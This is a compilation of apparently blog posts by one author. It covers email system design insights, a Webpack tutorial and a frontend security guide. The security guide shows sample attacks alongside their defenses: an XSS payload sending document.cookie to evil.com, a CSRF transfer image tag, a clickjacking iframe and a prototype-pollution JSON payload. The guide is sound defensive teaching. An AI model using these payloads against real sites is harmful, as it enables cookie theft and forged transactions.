  Final state: email always reaches DELIVERED or BOUNCED — never silently lost

Key Insights Checklist

"The Outbox Table makes DB write and Kafka publish effectively atomic. DB is the source of truth, not Kafka. Email is never lost because the persistent record exists before any async work begins."
"Attachment scanning is pre-computed at upload time. By send time, the result is a single Redis lookup. Scanning at send time would add 200–500ms to every email on the hot path."
"Cassandra partition key is user_id. Every inbox query and every inbox write maps to a single partition. No scatter-gather, no joins. This is why Cassandra is the right choice here — not for its write speed generally, but for this specific access pattern."
"SMTP is a protocol, not a server. Every mail server speaks it. The MX cache avoids DNS lookup per email — at 3.5M cross-domain emails/sec, that's the difference between functional and overloaded."
"Registration must be strongly consistent — email ID as PRIMARY KEY in each DB shard. Consistent hashing guarantees two registrations for the same email ID always land on the same shard. DB constraint handles the race without a global lock."
"The validation pipeline runs in parallel, not serially. Each service writes its result to Validation DB independently. The orchestrator checks when all columns are set — no service blocks another."
"Spam filtering is layered cheapest-first: IP reputation at 1ms eliminates 60% of spam before the ML model ever sees it. Only ~40% of mail needs the 100ms ML inference — this makes the economics work at 3.5M emails/sec."
"Gmail acknowledges 250 Message accepted to external senders before the email reaches the inbox. Once we own the message off the wire, Kafka + Cassandra guarantee delivery. The sender's responsibility ends at 250."
"Rate limiting is a correctness requirement for email. Without it, one compromised account becomes a spam cannon for the entire platform. A Redis sliding window counter at < 1ms cost per send is the cheapest correctness guarantee in the system."

Webpack

Arghya Majumder — Tue, 07 Apr 2026 21:15:52 +0000

What is Webpack?

Webpack is a static module bundler for JavaScript applications. It takes your source files — JS, CSS, images, fonts — and bundles them into optimized output files the browser can load.

One-liner: Webpack walks your dependency graph, transforms every file type it encounters (via loaders), and emits optimized bundles (via plugins).

Why Do We Need It?

The Real Root Problem: Browsers Have No Module System

Before ES Modules (ES2015), the browser had one shared global scope for all JavaScript. Every <script> tag dumped its variables into window.

<!-- All three files share window — one global scope -->
<script src="utils.js"></script>    <!-- defines window.helper -->
<script src="lodash.js"></script>   <!-- also defines window._ -->
<script src="app.js"></script>      <!-- must load last or it breaks -->

What this means in practice:

// utils.js
var data = [];          // window.data — global

// vendor.js (some third-party lib)
var data = 'config';   // window.data — OVERWRITTEN silently

// app.js
console.log(data);     // 'config' — not what you expected

Any script can overwrite any other script's variables — silent collisions
Load order is a runtime contract you must manually maintain
No way to say "this function belongs to this file only"

The pre-webpack workaround: IIFE (Immediately Invoked Function Expression)

// Each file wraps itself in a function to create a private scope
(function() {
  var data = [];   // scoped to this function, NOT window
  window.MyApp = { data };  // expose only what you want to
})();

Works but: verbose, manual, no dependency tracking, still relies on load order.

CommonJS (Node.js) solved this on the server:

// Node modules have their own scope — no global leak
const data = require('./data');  // isolated
module.exports = { doSomething };

But browsers couldn't run require() — it's synchronous and browsers load files over the network (async).

Webpack bridges this gap:

Webpack brings the CommonJS/ESM module system to the browser. It takes your import/require calls, resolves the full dependency graph at build time, and emits a single bundle where each module is wrapped in its own function scope — no global leaks.

// What you write
import { add } from './math';
export const result = add(1, 2);

// What webpack emits (simplified)
(function(modules) {
  function __webpack_require__(moduleId) {
    var module = { exports: {} };
    modules[moduleId](module, module.exports, __webpack_require__);
    return module.exports;
  }
  __webpack_require__(0); // start from entry
})({
  0: function(module, exports, require) {
    // your index.js — isolated scope
    var math = require(1);
    exports.result = math.add(1, 2);
  },
  1: function(module, exports, require) {
    // your math.js — isolated scope
    exports.add = function(a, b) { return a + b; };
  }
});

Each module is a function. Its variables are local to that function. Zero global scope pollution. This is what webpack actually compiles your code into.

What webpack solves:

Problem	Webpack solution
Global scope collisions	Each module wrapped in its own function scope
50 HTTP requests	Bundle all JS into 1–3 files
`require()` in browser	Webpack's runtime implements `__webpack_require__`
Non-JS assets (CSS, images)	Loaders transform anything into a module
Send only what's needed	Code splitting + lazy loading
Unused code in bundle	Tree shaking removes dead code
Dev feedback speed	Hot Module Replacement (HMR)

Why not just use native ES Modules in the browser?
You can — modern browsers support <script type="module">. But: no tree shaking, no code splitting control, no loader pipeline for CSS/images, no HMR, and hundreds of individual network requests in development. Webpack (or Vite) still wins for production apps.

Core Concepts

1. Entry

The starting point — webpack builds the dependency graph from here.

entry: './src/index.js'
// or multiple entries
entry: { app: './src/app.js', admin: './src/admin.js' }

2. Output

Where and how to emit the bundled files.

output: {
  filename: '[name].[contenthash].js',  // cache busting
  path: path.resolve(__dirname, 'dist')
}

3. Loaders

Webpack only understands JS and JSON by default. Loaders transform other file types into modules.

module: {
  rules: [
    { test: /\.jsx?$/, use: 'babel-loader' },   // JSX → JS
    { test: /\.css$/, use: ['style-loader', 'css-loader'] },
    { test: /\.png$/, type: 'asset/resource' }  // images
  ]
}

Loaders run right to left in the use array — css-loader first (resolves imports), then style-loader (injects into DOM).

4. Plugins

Plugins operate on the output bundle — more powerful than loaders.

plugins: [
  new HtmlWebpackPlugin({ template: './index.html' }),  // injects <script> tags
  new MiniCssExtractPlugin({ filename: '[name].css' }), // extracts CSS to file
  new DefinePlugin({ 'process.env.NODE_ENV': '"production"' })
]

5. Mode

mode: 'development' | 'production' | 'none'

Mode	What it does
`development`	Source maps, readable output, HMR enabled
`production`	Minification, tree shaking, scope hoisting, content hash

How Webpack Works — Internally

Dependency graph example:

Everything is a module — CSS, images, fonts. Webpack handles them all through loaders.

Chunks & Code Splitting

A chunk is a group of modules that get emitted as a single output file.

Types of Chunks

Chunk type	Description
Initial chunk	The main bundle loaded on page start
Async chunk	Lazy-loaded chunk created by dynamic `import()`
Runtime chunk	Webpack's internal module loading logic

Why Code Splitting?

Without it, 1 giant bundle → user downloads all code upfront even for pages they never visit.

Dynamic Import (lazy loading)

// Loaded only when user navigates to /dashboard
const Dashboard = React.lazy(() => import('./Dashboard'));

Webpack sees import() and creates a separate async chunk — loaded on demand.

SplitChunksPlugin (vendor splitting)

optimization: {
  splitChunks: {
    chunks: 'all',         // split async AND initial chunks
    cacheGroups: {
      vendor: {
        test: /node_modules/,
        name: 'vendors',   // react, lodash → vendors.js (cached separately)
      }
    }
  }
}

Why split vendors? Your app code changes on every deploy. node_modules rarely change. Separate chunks → vendors.js stays cached in the browser even after app updates.

Without splitting:   bundle.js (2MB)  → all users re-download 2MB every deploy
With splitting:      app.js (200KB)   → re-downloaded on deploy
                     vendors.js (1.8MB) → cached long-term (no change)

Styles

Three ways to handle CSS:

1. style-loader + css-loader (development)

{ test: /\.css$/, use: ['style-loader', 'css-loader'] }

css-loader: resolves @import and url(), converts CSS to JS module
style-loader: injects <style> tag into DOM at runtime

Problem: CSS is bundled inside JS → flash of unstyled content; no browser caching for CSS separately.

2. MiniCssExtractPlugin (production)

{ test: /\.css$/, use: [MiniCssExtractPlugin.loader, 'css-loader'] }

Extracts CSS into separate .css files → loaded in parallel with JS, browser-cached independently.

3. CSS Modules

{ test: /\.css$/, use: ['style-loader', { loader: 'css-loader', options: { modules: true } }] }

Locally scoped class names — styles.button becomes _src_Button_button_abc123 — zero global conflicts.

Tree Shaking

Removes dead code (exported but never imported) from the final bundle.

// utils.js
export const add = (a, b) => a + b;
export const subtract = (a, b) => a - b; // never used anywhere

// app.js
import { add } from './utils';  // only 'add' imported

Webpack in production mode: subtract is never imported → eliminated from bundle.

Requirements for tree shaking:

ES Modules (import/export) — NOT CommonJS (require)
"sideEffects": false in package.json (or list files with side effects)
mode: 'production'

Module Federation

Problem it solves: You have 5 micro-frontends, each a separate webpack build. How do they share React without bundling it 5 times? How can App A expose a <Header> component that App B consumes at runtime — without rebuilding either?

Module Federation allows separate webpack builds to share modules at runtime — across different deployments.

Key concepts

Term	Meaning
Host	The app that consumes remote modules
Remote	The app that exposes modules for others to consume
Shared	Libraries loaded only once (e.g. React, ReactDOM)
Exposes	What the remote makes available

Example

// Remote app (header-app/webpack.config.js)
new ModuleFederationPlugin({
  name: 'headerApp',
  filename: 'remoteEntry.js',       // manifest file — loaded by hosts
  exposes: {
    './Header': './src/Header.jsx', // what we share
  },
  shared: { react: { singleton: true }, 'react-dom': { singleton: true } }
})

// Host app (shell/webpack.config.js)
new ModuleFederationPlugin({
  name: 'shell',
  remotes: {
    headerApp: 'headerApp@https://header.example.com/remoteEntry.js'
  },
  shared: { react: { singleton: true }, 'react-dom': { singleton: true } }
})

// Usage in host
const Header = React.lazy(() => import('headerApp/Header'));

What happens at runtime:

Host loads remoteEntry.js from the remote's URL
Remote's module map is registered in the browser
import('headerApp/Header') fetches only that component's chunk
React is shared — loaded once, not duplicated across all apps

Why it matters:

Independent deployments — header team deploys without rebuilding shell
Shared dependencies — React loaded once across all micro-frontends
Runtime composition — apps can even load different versions of a remote

The Global Scope Trick — How Module Federation Actually Works

This is the tricky part interviewers love. Module Federation deliberately uses the browser's global scope to coordinate between independently built apps.

Webpack normally fights against global scope (wraps everything in module functions). But for Module Federation to work across separately deployed apps, it intentionally uses window (globalThis) as a shared registry.

Step 1 — Remote registers itself on window:

When the browser loads remoteEntry.js, webpack executes:

// remoteEntry.js (auto-generated by webpack)
var headerApp;          // will be assigned to window.headerApp
// ...
self["headerApp"] = __webpack_expose_module__(/* module map */);

So window.headerApp is now a container object with two methods:

window.headerApp.init(sharedScope) — initializes shared modules
window.headerApp.get('./Header') — returns a factory for the Header module

Step 2 — Host accesses it via the global:

// Host runtime (simplified)
const container = window['headerApp'];  // global lookup
await container.init(__webpack_share_scopes__.default);
const factory = await container.get('./Header');
const Header = factory();  // actual React component

import('headerApp/Header') in your code is syntax sugar — webpack compiles it into this global lookup under the hood.

Step 3 — Shared scope coordinates React (avoiding duplicates):

// window.__webpack_share_scopes__.default — another global!
{
  "react": {
    "18.2.0": {
      get: () => Promise.resolve(() => require('react')),
      loaded: true,
      from: 'shell'   // which app loaded it first
    }
  }
}

When the remote tries to load React, it checks __webpack_share_scopes__ first. React is already there (loaded by the host) → reuses it. This is how one React instance is shared across 5 micro-frontend apps.

Why this is the trick:

Normal webpack:    window pollution = BAD (modules wrapped in functions)
Module Federation: window pollution = DELIBERATE (cross-app coordination)

MF has no choice — two separately built, separately deployed apps have no other shared channel except the browser's global scope. There's no import statement that works across deployment boundaries at runtime. The global registry IS the communication protocol.

What can go wrong:

window.headerApp is undefined → remoteEntry.js didn't load (network failure, wrong URL)
React version mismatch → if singleton: true is not set, both apps load their own React → hooks break (React requires exactly one instance)
Init order race → host must await container.init() before calling container.get() — if you skip the await, you get "cannot read property of undefined"

Passing Data: Host → Remote (Module Federation)

This is a common interview follow-up: "You've loaded a remote component — how do you pass data to it?"

Module Federation loads remote components lazily at runtime. They are still React components — but the trick is they live in a different webpack scope (different build, different __webpack_require__). Data passing strategies ranked by use case:

Strategy 1 — Props (simplest, most natural)

The remote just exposes a React component. The host passes props like any other component.

// Remote exposes a normal component
// header-app/src/Header.jsx
export default function Header({ user, onLogout }) {
  return <div>Hello {user.name} <button onClick={onLogout}>Logout</button></div>;
}

// Host uses it with props
const Header = React.lazy(() => import('headerApp/Header'));

function Shell({ user }) {
  return <Header user={user} onLogout={() => logout()} />;
}

Works perfectly. The component boundary is normal React — props flow as usual. The webpack complexity is invisible at this level.

Limitation: Props only flow down. Remote can't push data back up without callbacks. Fine for display components, limiting for complex state.

Strategy 2 — Exposed API / Hook (remote → host)

The reverse of props. Instead of the host pushing data down, the remote exposes its own hooks, functions, or store actions — and the host imports and uses them directly. The remote owns the data; the host just pulls from it.

// cart-app/webpack.config.js — remote exposes its own API surface
new ModuleFederationPlugin({
  name: 'cartApp',
  exposes: {
    './useCart':   './src/hooks/useCart',    // hook
    './cartStore': './src/store/cartStore',  // store actions
  }
})

// cart-app/src/hooks/useCart.js — remote owns this data
export function useCart() {
  const [items, setItems] = useState([]);
  const addItem   = (item) => setItems(prev => [...prev, item]);
  const removeItem = (id)  => setItems(prev => prev.filter(i => i.id !== id));
  return { items, count: items.length, addItem, removeItem };
}

// Host imports and uses the remote's hook — host never manages cart state
import { useCart } from 'cartApp/useCart';

function ShellHeader() {
  const { count } = useCart(); // remote owns the data, host just reads
  return <Badge count={count} />;
}

function ProductPage({ productId }) {
  const { addItem } = useCart(); // host calls remote's action
  return <button onClick={() => addItem({ id: productId })}>Add to cart</button>;
}

Why this is genuinely different from props:

Data direction is remote → host (props is host → remote)
Remote is the source of truth for this domain — host doesn't even hold the state
Works for cross-remote too — Remote A can import Remote B's hook with no host involvement
Remote team fully owns the API contract; host team just consumes it

Limitation: Both apps must share the same React instance (singleton: true) for hooks to work. Also, the hook runs in the host's React tree — if the same hook is imported in two places, two separate state instances are created (not one shared cart). Fix: expose a store (Zustand/Redux) instead of a raw hook if shared singleton state is needed.

Best for: Feature-team ownership — cart team owns cart state and exposes a clean API; shell team consumes it without caring about implementation.

Strategy 3 — Shared Store (Redux / Zustand via shared modules)

Both host and remote depend on the same state library. You declare it as a shared singleton in Module Federation config. Both apps use the exact same store instance at runtime.

// Both host and remote webpack.config.js
new ModuleFederationPlugin({
  shared: {
    'zustand': { singleton: true, requiredVersion: '^4.0.0' },
    './src/store': { singleton: true }  // share the store module itself
  }
})

// Remote reads from the shared store directly
import { useStore } from 'zustand';
import { useAppStore } from 'hostApp/store'; // or a shared package

function RemoteCart() {
  const user = useAppStore(state => state.user); // same store the host writes to
  return <div>{user.name}'s cart</div>;
}

Why singleton matters: Without singleton: true, host loads Zustand 4.1, remote loads Zustand 4.2 — two different instances — store reads return nothing. singleton: true forces one version to win and both apps use it.

Best for: Deeply integrated micro-frontends where the remote genuinely needs global app state (auth, cart, theme).

Strategy 4 — Custom Events (decoupled, cross-framework)

Host and remote communicate through the browser's native CustomEvent API on window. Zero coupling — works even if remote is Vue and host is React.

// Host dispatches an event when user logs in
window.dispatchEvent(new CustomEvent('app:user-changed', {
  detail: { user: { id: 1, name: 'Alice', role: 'admin' } }
}));

// Remote listens — doesn't know or care who the host is
useEffect(() => {
  const handler = (e) => setUser(e.detail.user);
  window.addEventListener('app:user-changed', handler);
  return () => window.removeEventListener('app:user-changed', handler);
}, []);

Best for: Loosely coupled apps from different teams, cross-framework communication, fire-and-forget events (user logged out, theme changed, language switched).

Limitation: No history — remote mounted after the event fires misses it. Fix: host also writes to window.__APP_STATE__ as a fallback initial read.

Strategy 5 — Shared Context (React-specific, elegant)

Host exposes a React Context provider as a shared module. Remote consumes it. Both use the same React instance (enforced by singleton: true) so context propagates normally.

// host-app/src/UserContext.js (exposed via MF)
export const UserContext = React.createContext(null);
export const UserProvider = ({ children }) => {
  const [user, setUser] = useState(null);
  return <UserContext.Provider value={{ user, setUser }}>{children}</UserContext.Provider>;
};

// host webpack.config.js
exposes: { './UserContext': './src/UserContext' }

// Remote consumes it
import { UserContext } from 'hostApp/UserContext';
const { user } = useContext(UserContext);

Why this works: Context lives in React's internal fiber tree, not in a module variable. As long as both apps use the same React instance (singleton: true), context crosses the module federation boundary transparently.

Best for: Auth context, theme context, feature flags — any tree-wide data the host owns that remotes need to read.

Which Pattern When?

#	Pattern	Direction	Use when	Avoid when
1	Props	host → remote	Remote is a display component	Remote needs to push data back up
2	Exposed API / Hook	remote → host	Remote owns the domain (cart, auth)	Hook creates two instances — use store instead
3	Shared Store	bidirectional	Deep integration, remote needs read+write	Teams shouldn't share state contracts
4	Custom Events	any direction	Cross-framework, loosely coupled teams	You need synchronous read of current state
5	Shared Context	any direction	React-only, tree-wide data (auth, theme)	Remote is not React

Content Hashing & Caching

output: {
  filename: '[name].[contenthash].js'
}

[contenthash] changes only when file content changes
app.abc123.js → unchanged → browser uses cache
app.def456.js → content changed → browser re-downloads

Without content hash: every deploy invalidates all caches even if only one file changed.

HMR — Hot Module Replacement

In development, webpack watches for file changes and pushes only the changed module to the browser — without a full page reload.

File saved → webpack recompiles changed module →
  WebSocket push to browser → module swapped in memory →
  React state preserved

vs. Live Reload: changes any file → full browser refresh → state lost.

Other Important Concepts

`resolve.alias` — Path Shortcuts

Tired of ../../components/Button? Alias maps a short name to a path.

resolve: {
  alias: {
    '@components': path.resolve(__dirname, 'src/components'),
    '@utils':      path.resolve(__dirname, 'src/utils'),
  }
}

// Now in any file:
import Button from '@components/Button'; // instead of '../../components/Button'

Also configure resolve.extensions so you can skip file extensions:

resolve: { extensions: ['.tsx', '.ts', '.jsx', '.js'] }
// import App from './App'  → webpack tries App.tsx, App.ts, App.jsx, App.js

`publicPath` — Where Assets Are Served From

Tells webpack the base URL prefix for all asset URLs in the output.

output: {
  publicPath: 'https://cdn.example.com/assets/'
}
// → <script src="https://cdn.example.com/assets/app.abc123.js">
// → background: url('https://cdn.example.com/assets/logo.png')

If you deploy to a sub-path: publicPath: '/my-app/'. If wrong, lazy-loaded chunks 404 because the browser requests /chunk.js instead of /my-app/chunk.js. Module Federation also uses publicPath to build the URL for remoteEntry.js — critical to get right.

`devServer` — Local Development

devServer: {
  port: 3000,
  hot: true,              // HMR
  historyApiFallback: true, // SPA: serve index.html for all 404 routes
  proxy: {
    '/api': 'http://localhost:8080'  // proxy API calls to backend
  }
}

historyApiFallback is critical for React Router — without it, refreshing /dashboard returns a 404 because there's no actual file at that path.

Source Maps — Debugging Minified Code

Minified production code is unreadable. Source maps link minified output back to original source.

devtool: 'eval-cheap-module-source-map'  // fast, development only
devtool: 'source-map'                    // separate .map file, production-safe
devtool: false                           // no source maps (fastest build)

`devtool` value	Speed	Use case
`eval`	Fastest	Dev only, no column info
`eval-cheap-module-source-map`	Fast	Dev — good quality, recommended
`source-map`	Slow	Production — full, separate `.map` file
`hidden-source-map`	Slow	Production — map not linked in bundle (upload to Sentry only)

hidden-source-map is the production best practice: you upload the .map to your error tracker (Sentry) but it's never exposed to users in the browser.

Environment Variables

// webpack.config.js
new webpack.DefinePlugin({
  'process.env.API_URL': JSON.stringify(process.env.API_URL),
  'process.env.NODE_ENV': JSON.stringify('production'),
})

DefinePlugin does text replacement at build time — not runtime injection. process.env.API_URL in source code is literally replaced with the string value during compilation. Dead code elimination then removes if (process.env.NODE_ENV === 'development') { ... } blocks entirely in production.

// Source code
if (process.env.NODE_ENV === 'development') {
  console.log('debug info');  // ← removed entirely in production build
}

Webpack 5 Persistent Cache

Build times in large projects can exceed 60 seconds. Webpack 5 introduced filesystem caching — stores the compilation result to disk between builds.

cache: {
  type: 'filesystem',          // persist to disk (vs 'memory' — default)
  buildDependencies: {
    config: [__filename],      // invalidate cache if webpack.config.js changes
  }
}

First build: normal speed (populates cache)
Subsequent builds: 5–10× faster — only changed modules are recompiled
Cache stored in node_modules/.cache/webpack

Asset Modules (Webpack 5) — No More url-loader / file-loader

Webpack 5 handles static assets natively without extra loaders.

module: {
  rules: [
    {
      test: /\.(png|jpg|gif|svg)$/,
      type: 'asset',           // auto: inline if <8KB, emit file if >8KB
    },
    {
      test: /\.svg$/,
      type: 'asset/inline',   // always base64 inline (no HTTP request)
    },
    {
      test: /\.(woff2|ttf)$/,
      type: 'asset/resource', // always emit as separate file
    }
  ]
}

Asset type	Behavior
`asset/resource`	Emits file, returns URL
`asset/inline`	Base64-encodes into bundle (no extra request)
`asset/source`	Returns file content as string
`asset`	Auto-decides: inline if under `parser.dataUrlCondition.maxSize`

Webpack vs Alternatives

Tool	Approach	Best for
Webpack	Full bundler, highly configurable	Large apps, micro-frontends, complex pipelines
Vite	ESM dev server (no bundle in dev), Rollup for prod	Fast DX, modern projects
Rollup	Optimized for libraries	Publishing npm packages
esbuild	Go-based, extremely fast	CI speed, used inside Vite
Parcel	Zero-config bundler	Small/medium apps

Webpack is the most configurable and battle-tested. Vite is winning for new projects due to near-instant dev server. In large enterprises with module federation requirements, webpack remains dominant.

Interview Summary

One-liner definitions

Concept	Say this
Webpack	"A static module bundler that builds a dependency graph from an entry point and emits optimized chunks via loaders and plugins."
Loader	"Transforms a non-JS file type into a JS module webpack can process."
Plugin	"Hooks into the compilation lifecycle to perform operations on the output bundle — minification, extraction, injection."
Chunk	"A group of modules emitted as a single output file — can be initial (loaded on start) or async (lazy-loaded on demand)."
Tree shaking	"Dead code elimination for ES modules — unused exports are removed at build time in production mode."
Module Federation	"Allows separate webpack builds to expose and consume modules from each other at runtime — enables true independent micro-frontend deployments."

Key talking points

"Webpack solves the N-HTTP-requests problem by building a dependency graph and bundling everything. But the real power is code splitting — you only send what the user needs for the current page."
"Loaders and plugins are often confused. Loaders transform individual files before they enter the graph. Plugins operate on the entire compilation — they can split chunks, extract CSS, inject HTML, anything."
"Tree shaking only works with ES modules because they're statically analyzable. CommonJS require() is dynamic — webpack can't know at build time which exports are used."
"The vendor split trick is critical for caching. App code changes every deploy, node_modules rarely do. Separate chunks = vendors stay cached, only app re-downloads."
"Module federation is the webpack answer to micro-frontends. Instead of each app bundling React separately, they share it at runtime. The host loads a remoteEntry.js manifest and pulls modules from other deployed apps on demand."
"MF deliberately uses window as a shared registry — window.headerApp is the container. This is the one place webpack intentionally pollutes global scope, because there's no other communication channel between separately deployed builds at runtime."
"Data passing in MF has five patterns. Props (host → remote) and Exposed API/Hook (remote → host) are the two direct module patterns — mirror images of each other. Then Shared Store (bidirectional, deep integration), Custom Events (decoupled, cross-framework), and Shared Context (React tree-wide). The key insight with Exposed API: the remote owns the domain data and exposes a clean hook or store — the host just consumes it without holding any of that state itself."
"Source maps in production should be hidden-source-map — the .map file is generated and uploaded to an error tracker like Sentry, but never linked in the bundle. Users can't read your source. Your engineers can debug stack traces."
"Webpack 5 persistent cache (cache: { type: 'filesystem' }) makes repeat builds 5–10× faster. It's a one-liner that most teams don't know about but should always use in CI."

Frontend Security: A Senior Engineer's Guide

Arghya Majumder — Tue, 31 Mar 2026 19:38:32 +0000

Frontend Security: A Senior Engineer's Guide

Security is not optional. Understanding attack vectors and defenses is essential for any production system.

1. XSS (Cross-Site Scripting)

The most common frontend vulnerability (~40% of reported vulnerabilities). Attacker injects malicious scripts into your page.

Types of XSS

Type	How It Works	Example
Stored XSS	Malicious script saved in DB, served to all users	Comment: `<script>steal(cookies)</script>`
Reflected XSS	Script in URL, reflected in response	`site.com/search?q=<script>alert(1)</script>`
DOM-based XSS	Script manipulates DOM client-side	`innerHTML = location.hash`

Attack Example

// User submits this as their "name"
const userName = '<img src=x onerror="fetch(\'https://evil.com/steal?cookie=\'+document.cookie)">';

// Vulnerable code
document.getElementById('greeting').innerHTML = `Hello, ${userName}!`;

// Result: Attacker gets all cookies!

Defense: Output Encoding

// NEVER use innerHTML with user data
element.innerHTML = userInput;  // DANGEROUS

// Use textContent instead
element.textContent = userInput;  // SAFE - treats as text, not HTML

// Or sanitize HTML when you need rich content
import DOMPurify from 'dompurify';
element.innerHTML = DOMPurify.sanitize(userInput);

Defense: React's Automatic Escaping

// React escapes by default - SAFE
<div>{userInput}</div>

// DANGEROUS - explicitly bypasses protection
<div dangerouslySetInnerHTML={{ __html: userInput }} />

// If you must use it, sanitize first
<div dangerouslySetInnerHTML={{ __html: DOMPurify.sanitize(userInput) }} />

Defense: Content Security Policy (CSP)

Content-Security-Policy:
  default-src 'self';
  script-src 'self' https://trusted-cdn.com;
  style-src 'self' 'unsafe-inline';
  img-src *;
  connect-src 'self' https://api.myapp.com;
  frame-ancestors 'none';

Directive	Purpose
`default-src`	Fallback for all resource types
`script-src`	Where JS can load from
`style-src`	Where CSS can load from
`img-src`	Where images can load from
`connect-src`	Where fetch/XHR can connect
`frame-ancestors`	Who can embed this page (clickjacking prevention)

CSP: Nonces for Inline Scripts

<!-- Server generates random nonce per request -->
<script nonce="random123abc">
  // This inline script is allowed
  console.log('Trusted inline code');
</script>

<!-- Header includes the nonce -->
Content-Security-Policy: script-src 'nonce-random123abc'

<!-- Attacker's injected script has no nonce = BLOCKED -->
<script>alert('XSS')</script>

Defense: Trusted Types API

// Force browser to block unsafe DOM manipulations
// Works in Chrome/Edge

// In CSP header:
Content-Security-Policy: require-trusted-types-for 'script'

// Now this throws an error:
element.innerHTML = userInput;  // TypeError!

// Must use a Trusted Type:
const policy = trustedTypes.createPolicy('myPolicy', {
  createHTML: (input) => DOMPurify.sanitize(input)
});

element.innerHTML = policy.createHTML(userInput);  // OK

2. CSRF (Cross-Site Request Forgery)

Attacker tricks user's browser into making authenticated requests to your site.

The Attack

1. User logs into bank.com (session cookie set)
2. User visits evil.com
3. evil.com has: <img src="https://bank.com/transfer?to=attacker&amount=10000">
4. Browser sends request WITH bank.com cookies automatically
5. Transfer happens without user's knowledge!

Defense: SameSite Cookies

Set-Cookie: session=abc123; SameSite=Strict; Secure; HttpOnly

SameSite Value	Behavior
`Strict`	Cookie NEVER sent on cross-site requests
`Lax`	Cookie sent on top-level navigations (links), not forms/images
`None`	Cookie always sent (must have `Secure` flag)

Defense: CSRF Tokens (Synchronizer Token Pattern)

<!-- Server embeds unique token in form -->
<form action="/transfer" method="POST">
  <input type="hidden" name="csrf_token" value="abc123xyz">
  <input type="text" name="amount">
  <button type="submit">Transfer</button>
</form>

// Server validates token matches session
if (request.body.csrf_token !== session.csrfToken) {
  return res.status(403).send('Invalid CSRF token');
}

Defense: Double-Submit Cookie (For SPAs)

// Server sets a random value in a cookie
Set-Cookie: XSRF-TOKEN=random123; Path=/

// Frontend reads it and sends in header
const token = document.cookie
  .split('; ')
  .find(row => row.startsWith('XSRF-TOKEN='))
  ?.split('=')[1];

fetch('/api/transfer', {
  method: 'POST',
  headers: {
    'X-XSRF-TOKEN': token  // Server compares cookie vs header
  }
});

// Attacker can't read our cookies, so can't forge the header!

3. Secure State & Storage Management

One of the most common senior-level mistakes is storing sensitive data insecurely.

The Storage Hierarchy

Storage	Security	Use For
`localStorage`	Accessible to ANY JS (XSS vulnerable)	Non-sensitive preferences
`sessionStorage`	Same as localStorage, cleared on tab close	Temporary non-sensitive data
`HttpOnly Cookie`	NOT accessible to JS	Session tokens, auth tokens
`In-Memory`	Lost on refresh, safest from XSS	Short-lived access tokens

The Secure Token Pattern

┌──────────┐                              ┌──────────┐
│  Client  │                              │  Server  │
└────┬─────┘                              └────┬─────┘
     │                                         │
     │  Login: username/password               │
     │────────────────────────────────────────▶│
     │                                         │
     │  Access Token (15min) in JSON body      │
     │  Refresh Token in HttpOnly cookie       │
     │◀────────────────────────────────────────│
     │                                         │
     │  Store access token IN MEMORY ONLY      │
     │                                         │
     │  API calls with: Authorization: Bearer  │
     │────────────────────────────────────────▶│
     │                                         │
     │  Access token expired (401)             │
     │◀────────────────────────────────────────│
     │                                         │
     │  POST /refresh (HttpOnly cookie sent)   │
     │────────────────────────────────────────▶│
     │                                         │
     │  New access token in response body      │
     │◀────────────────────────────────────────│

Why this pattern?

Access token in memory: XSS can't steal it from localStorage
Refresh token in HttpOnly cookie: XSS can't read it
Short-lived access token: Limits damage window if stolen

4. Clickjacking (UI Redressing)

Attacker overlays invisible iframe over legitimate content.

The Attack

<!-- On evil.com -->
<style>
  iframe {
    opacity: 0;
    position: absolute;
    top: 0; left: 0;
    width: 100%; height: 100%;
  }
</style>

<button>Click to win $1000!</button>
<iframe src="https://bank.com/transfer?to=attacker"></iframe>

<!-- User thinks they click button, actually clicks iframe -->

Defense: X-Frame-Options

X-Frame-Options: DENY              # Never allow framing
X-Frame-Options: SAMEORIGIN        # Only same origin can frame

Defense: CSP frame-ancestors (Modern)

Content-Security-Policy: frame-ancestors 'self' https://trusted.com

5. Third-Party Supply Chain Attacks

Modern frontend apps have thousands of dependencies. If one package is compromised, your system is at risk.

Defense: Subresource Integrity (SRI)

<script
  src="https://cdn.example.com/library.js"
  integrity="sha384-oqVuAfXRKap7fdgcCY5uykM6+R9GqQ8K/uxy9rx7HNQlGYl1kPzQho1wx4JwY8wC"
  crossorigin="anonymous">
</script>

If the file's hash doesn't match, browser refuses to execute.

Defense: Automated Auditing

# In CI/CD pipeline
npm audit --audit-level=high
# Fails build if high/critical vulnerabilities found

Defense: Sandboxed Iframes for Third-Party Scripts

<!-- Risky third-party script (e.g., ad tracker) -->
<iframe
  src="https://ads.example.com/tracker"
  sandbox="allow-scripts"
  style="display: none;">
</iframe>

<!-- sandbox restricts: -->
<!-- - No access to parent DOM -->
<!-- - No cookies from parent origin -->
<!-- - No form submission -->
<!-- - No top-level navigation -->

6. Prototype Pollution

A JavaScript-specific attack where attacker modifies Object.prototype.

The Attack

// Vulnerable merge function
function merge(target, source) {
  for (let key in source) {
    if (typeof source[key] === 'object') {
      target[key] = merge(target[key] || {}, source[key]);
    } else {
      target[key] = source[key];
    }
  }
  return target;
}

// Attacker sends JSON payload:
const malicious = JSON.parse('{"__proto__": {"isAdmin": true}}');
merge({}, malicious);

// Now EVERY object has isAdmin: true!
const user = {};
console.log(user.isAdmin);  // true!

Defense

// Check for dangerous keys
function safeMerge(target, source) {
  for (let key in source) {
    if (key === '__proto__' || key === 'constructor' || key === 'prototype') {
      continue;  // Skip dangerous keys
    }
    if (typeof source[key] === 'object' && source[key] !== null) {
      target[key] = safeMerge(target[key] || {}, source[key]);
    } else {
      target[key] = source[key];
    }
  }
  return target;
}

// Or use Object.create(null) for prototype-less objects
const safeObject = Object.create(null);  // No prototype chain

7. Secrets Management

Never Expose in Frontend Code

// WRONG: Bundled into client JS, visible to anyone
const API_KEY = 'sk_live_abc123';
fetch(`https://api.stripe.com/charges?key=${API_KEY}`);

// RIGHT: Proxy through your server
fetch('/api/create-charge', { method: 'POST', body: data });

// Server adds the secret
app.post('/api/create-charge', (req, res) => {
  fetch('https://api.stripe.com/charges', {
    headers: { 'Authorization': `Bearer ${process.env.STRIPE_SECRET_KEY}` }
  });
});

What's OK to Expose

// Public/Publishable keys are DESIGNED for frontend
const STRIPE_PUBLISHABLE_KEY = 'pk_live_xyz';  // OK
const FIREBASE_API_KEY = 'AIzaSy...';  // OK (scoped by security rules)
const GOOGLE_MAPS_KEY = 'abc123';  // OK (restricted by HTTP referrer)

8. Secure Headers Checklist

# Prevent XSS
Content-Security-Policy: default-src 'self'; script-src 'self'

# Prevent clickjacking
X-Frame-Options: DENY

